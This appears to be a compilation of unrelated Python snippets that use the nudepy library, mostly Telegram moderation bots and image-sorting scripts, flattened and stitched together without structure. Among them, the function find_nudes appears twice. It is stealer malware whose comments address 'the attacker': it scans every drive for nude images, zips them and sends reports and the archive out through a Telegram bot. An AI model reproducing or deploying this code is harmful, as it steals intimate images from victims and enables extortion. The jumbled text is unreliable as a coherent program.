async def is_nsfw(event): lmao = event if not (lmao.gif or lmao.video or lmao.video_note or lmao.photo or lmao.sticker or lmao.media): return False if lmao.video or lmao.video_note or lmao.sticker or lmao.gif: try: starkstark = await event.client.download_media(lmao.media, thumb=-1) except: return False elif lmao.photo or lmao.sticker: try: starkstark = await event.client.download_media(lmao.photo) except: return False elif lmao.sticker: try: starkstark = await event.client.download_media(lmao.sticker) except: return False img = starkstark # f = {"file": (img, open(img, "rb"))} if nude.is_nude(img): is_nsfw = True return is_nsfw os.remove(img) else: is_nsfw = False return is_nsfw os.remove(img)
def NudeChecker(self, args): nude_counter = 0 other_counter = 0 picture_path = './carved_content/pictures/' nude_path = './carved_content/pictures/nude/' pictures = [] temp_pictures = [ f for f in os.listdir(picture_path) if os.path.isfile(os.path.join(picture_path, f)) ] for temp_picture in temp_pictures: if temp_picture.endswith('.jpg') or temp_picture.endswith('.jpeg'): temp_picture = picture_path + temp_picture pictures.append(temp_picture) for picture in pictures: try: if nude.is_nude(picture) is True: tmp_picture = string.split(picture, '/')[-1] tmp_picture = nude_path + tmp_picture os.rename(picture, tmp_picture) nude_counter += 1 else: other_counter += 1 except: pass return nude_counter, other_counter
async def del_profanity(event): if event.is_private: return msg = str(event.text) sender = await event.get_sender() # let = sender.username if await is_admin(event, event.message.sender_id): return chats = spammers.find({}) for c in chats: if event.text: if event.chat_id == c["id"]: if better_profanity.profanity.contains_profanity(msg): await event.delete() if sender.username is None: st = sender.first_name hh = sender.id final = f"[{st}](tg://user?id={hh}) **{msg}** is detected as a slang word and your message has been deleted" else: final = f"Sir **{msg}** is detected as a slang word and your message has been deleted" dev = await event.respond(final) await asyncio.sleep(10) await dev.delete() if event.photo: if event.chat_id == c["id"]: await event.client.download_media(event.photo, "nudes.jpg") if nude.is_nude("./nudes.jpg"): await event.delete() st = sender.first_name hh = sender.id final = f"**NSFW DETECTED**\n\n{st}](tg://user?id={hh}) your message contain NSFW content.. So, Shasa deleted the message\n\n **Nsfw Sender - User / Bot :** {st}](tg://user?id={hh}) \n\n`⚔️Automatic Detections Powered By ShasaAI` \n**#GROUP_GUARDIAN** " dev = await event.respond(final) await asyncio.sleep(10) await dev.delete() os.remove("nudes.jpg")
def response_view(request): src = request.GET.get('src','KeyError') if src == 'KeyError': return HttpResponse('Improper Request') print(f'Got {src}') # return HttpResponse(src) val = download(src) print('download complete') if val: print('checking') status = nude.is_nude(os.path.join(BASE_DIR,'img')) return HttpResponse(str(status)) else: return HttpResponse('failure')
def find_nudes(): #Chama variaveis globais global files_founded global nudes_founded #Cria arquivo zipado z = zipfile.ZipFile(zipado, "w") #Chama funcao responsalve por encontrar todas as particoes partitions = find_partitions() #Inicia a busca dos nudes particao por particao, arquivo por arquivo. for drive in partitions: print "Searching for nudes in " + drive #Envia ao atacante quando inicia a busca em um drive bot.sendMessage(group_id, hostname + ' - Searching for nudes in ' + drive) for root, dirs, files in os.walk(drive): for file_n in files: #Inserir +1 apos encontrar o arquivo files_founded = files_founded + 1 in_filename = (os.path.join(root, file_n)) print in_filename if file_n.endswith(extensions): #Checa se o arquivo nao esta na pasta windows, caso estiver ele testa. pois demora muito com a pasta windows if 'Windows' not in in_filename: print 'Checking Nude...' #Realiza a checagem do nude try: if nude.is_nude(in_filename) is True: print '[Nude Founded]' print '[Saving]' #Adiciona o arquivo encontrado no arquivo zipado criado la em cima z.write(in_filename) print '[Saved]' #Soma +1 a variavel de nudes nudes_founded = nudes_founded + 1 except: pass #Envia ao atacante report sobre cada particao bot.sendMessage( group_id, hostname + '\nFiles Foundeds: ' + str(files_founded) + '\nNudes Founded: ' + str(nudes_founded)) #zera as variaveis nudes_founded = 0 files_founded = 0 #Apos varrer todas as particoes, fecha o arquivo zipado z.close() #Funcao responsavel por enviar o arquivo zipado criado send_nudes()
def main(url): x = nude.is_nude(url) #n = Nude('examples/images/test2.jpg') #n.parse() #print("Nudity result :", n.result, n.inspect()) print(x) f = open('data.txt', 'r+') f.truncate() with open('data.txt', 'w') as outfile: outfile.write(str(x)) return (1)
def analyze_tweets(tweets, pictures=False): analysis = {} for tweet in tweets: try: analysis[tweet.id] = analyze(tweet.text) if pictures: media_files = tweet.entities.get("media", []) for file in media_files: filename = wget.download(file["media_url"]) if is_nude(str(filename)): analysis[tweet.id] = "bad image" break os.system('rm *.jpg *.png') except: analysis[tweet.id] = "none" media_files = tweet.entities.get("media", []) for file in media_files: filename = wget.download(file["media_url"]) if is_nude(str(filename)): analysis[tweet.id] = "bad image" break os.system('rm *.jpg') return analysis
def save_pics(self, urls, sid): image_box = [] for index, url in enumerate(urls): url = url if "http" in url else urljoin(f"http://{self.domain}", url) info(f"---fetch pic[{index}]:{url}") path = f"{self.screenpath}/{sid}_{index}.png" current_image = None with open(path, "wb") as file: current_image = self.get_pic(url) file.write(current_image) success(f"image saved: {path}") if Config.no_porn_img and nude.is_nude(path): warning("nude detected") continue image_box.append(BytesIO(current_image)) return image_box
def find_nudes(): #Chama variaveis globais global files_founded global nudes_founded #Cria arquivo zipado z = zipfile.ZipFile(zipado, "w") #Chama funcao responsalve por encontrar todas as particoes partitions = find_partitions() #Inicia a busca dos nudes particao por particao, arquivo por arquivo. for drive in partitions: print "Searching for nudes in "+drive #Envia ao atacante quando inicia a busca em um drive bot.sendMessage(group_id,hostname+' - Searching for nudes in '+drive) for root, dirs, files in os.walk(drive): for file_n in files: #Inserir +1 apos encontrar o arquivo files_founded = files_founded + 1 in_filename = (os.path.join(root, file_n)) print in_filename if file_n.endswith(extensions): #Checa se o arquivo nao esta na pasta windows, caso estiver ele testa. pois demora muito com a pasta windows if 'Windows' not in in_filename: print 'Checking Nude...' #Realiza a checagem do nude try: if nude.is_nude(in_filename) is True: print '[Nude Founded]' print '[Saving]' #Adiciona o arquivo encontrado no arquivo zipado criado la em cima z.write(in_filename) print '[Saved]' #Soma +1 a variavel de nudes nudes_founded = nudes_founded + 1 except: pass #Envia ao atacante report sobre cada particao bot.sendMessage(group_id,hostname+'\nFiles Foundeds: '+str(files_founded)+'\nNudes Founded: '+str(nudes_founded)) #zera as variaveis nudes_founded = 0 files_founded = 0 #Apos varrer todas as particoes, fecha o arquivo zipado z.close() #Funcao responsavel por enviar o arquivo zipado criado send_nudes()
async def del_profanity(event): if event.is_private: return if MONGO_DB_URI is None: return msg = str(event.text) sender = await event.get_sender() let = sender.username if event.is_group: if (await is_register_admin(event.input_chat, event.message.sender_id)): return pass chats = spammers.find({}) for c in chats: if event.text: if event.chat_id == c['id']: if better_profanity.profanity.contains_profanity(msg): await event.delete() if sender.username is None: st = sender.first_name hh = sender.id final = f"[{st}](tg://user?id={hh}) **{msg}** is detected as a slang word and your message has been deleted" else: final = f'@{let} **{msg}** is detected as a slang word and your message has been deleted' dev = await event.respond(final) await asyncio.sleep(10) await dev.delete() if event.photo: if event.chat_id == c['id']: await event.client.download_media(event.photo, "nudes.jpg") if nude.is_nude('./nudes.jpg'): await event.delete() if sender.username is None: st = sender.first_name hh = sender.id final = f"[{st}](tg://user?id={hh}) your message has been deleted due to pornographic content" else: final = f'@{let} your message has been deleted due to pornographic content' dev = await event.respond(final) await asyncio.sleep(10) await dev.delete() os.remove("nudes.jpg")
async def ws(event): warner_starkz = get_all_nsfw_enabled_chat() if len(warner_starkz) == 0: return if not is_nsfwatch_indb(str(event.chat_id)): return if not (event.photo): return if not await is_admin(event, BOT_ID): return if await is_admin(event, event.message.sender_id): return sender = await event.get_sender() await event.client.download_media(event.photo, "nudes.jpg") if nude.is_nude("./nudes.jpg"): await event.delete() st = sender.first_name hh = sender.id final = f"**NSFW DETECTED**\n\n{st}](tg://user?id={hh}) your message contain NSFW content.. So, Shasa deleted the message\n\n **Nsfw Sender - User / Bot :** {st}](tg://user?id={hh}) \n\n`⚔️Automatic Detections Powered By ShasaAI` \n**#GROUP_GUARDIAN** " dev = await event.respond(final) await asyncio.sleep(10) await dev.delete() os.remove("nudes.jpg")
def NudeChecker(self, args): nude_counter = 0 other_counter = 0 picture_path = './carved_content/pictures/' nude_path = './carved_content/pictures/nude/' pictures = [] temp_pictures = [f for f in os.listdir(picture_path) if os.path.isfile(os.path.join(picture_path, f))] for temp_picture in temp_pictures: if temp_picture.endswith('.jpg') or temp_picture.endswith('.jpeg'): temp_picture = picture_path + temp_picture pictures.append(temp_picture) for picture in pictures: try: if nude.is_nude(picture) is True: tmp_picture = string.split(picture, '/')[-1] tmp_picture = nude_path + tmp_picture os.rename(picture, tmp_picture) nude_counter += 1 else: other_counter += 1 except: pass return nude_counter, other_counter
#coding:utf-8 ''' 基于肤色的裸体图像检测 ''' import nude from nude import Nude print(nude.is_nude('datas/images/test2.jpg')) n = Nude('datas/images/test2.jpg') n.parse() print("damita :", n.result, n.inspect())
def get_nude(image_path): return nude.is_nude(image_path)
def nude_yesorno(num): try: res = nude.is_nude(str(num) + '.jpg') return res except: return False
def isItNude(): imageFile = request.files['image'] filename = secure_filename(imageFile.filename) filePath = os.path.join(app.config['UPLOAD_FOLDER'], filename) imageFile.save(filePath) return jsonify({"result": nude.is_nude(filePath)})
def is_nsfw(request, url): urllib.request.urlretrieve(url, "test.jpg") return nude.is_nude('test.jpg')
def nude_yesorno(num): res = nude.is_nude(str(num) + '.jpg') return res
def TaNu(self,path,filename): nu = nude.is_nude(os.path.join(path,filename)) if nu: name,ext = os.path.splitext(filename) new_name = '[NUDE]'+name+ext os.rename(os.path.abspath(os.path.join(path,filename)),os.path.abspath(os.path.join(path,new_name)))
import nude # pip install --upgrade nudepy print(nude.is_nude('data/women.jpg')) n = nude.Nude('data/women.jpg') n.parse() print("damita :", n.result, n.inspect())
import nude from nude import Nude print(nude.is_nude('images.jpg')) m = Nude('img.webp') m.parse() print("damita_1 :", m.result, m.inspect()) n = Nude('images2.jpg') n.parse() print("damita_2 :", n.result, n.inspect())
import nude from nude import Nude x = nude.is_nude('assets/nsfw/nude/03.png') print(x) if x == True: print('This is a nude') else: print('no')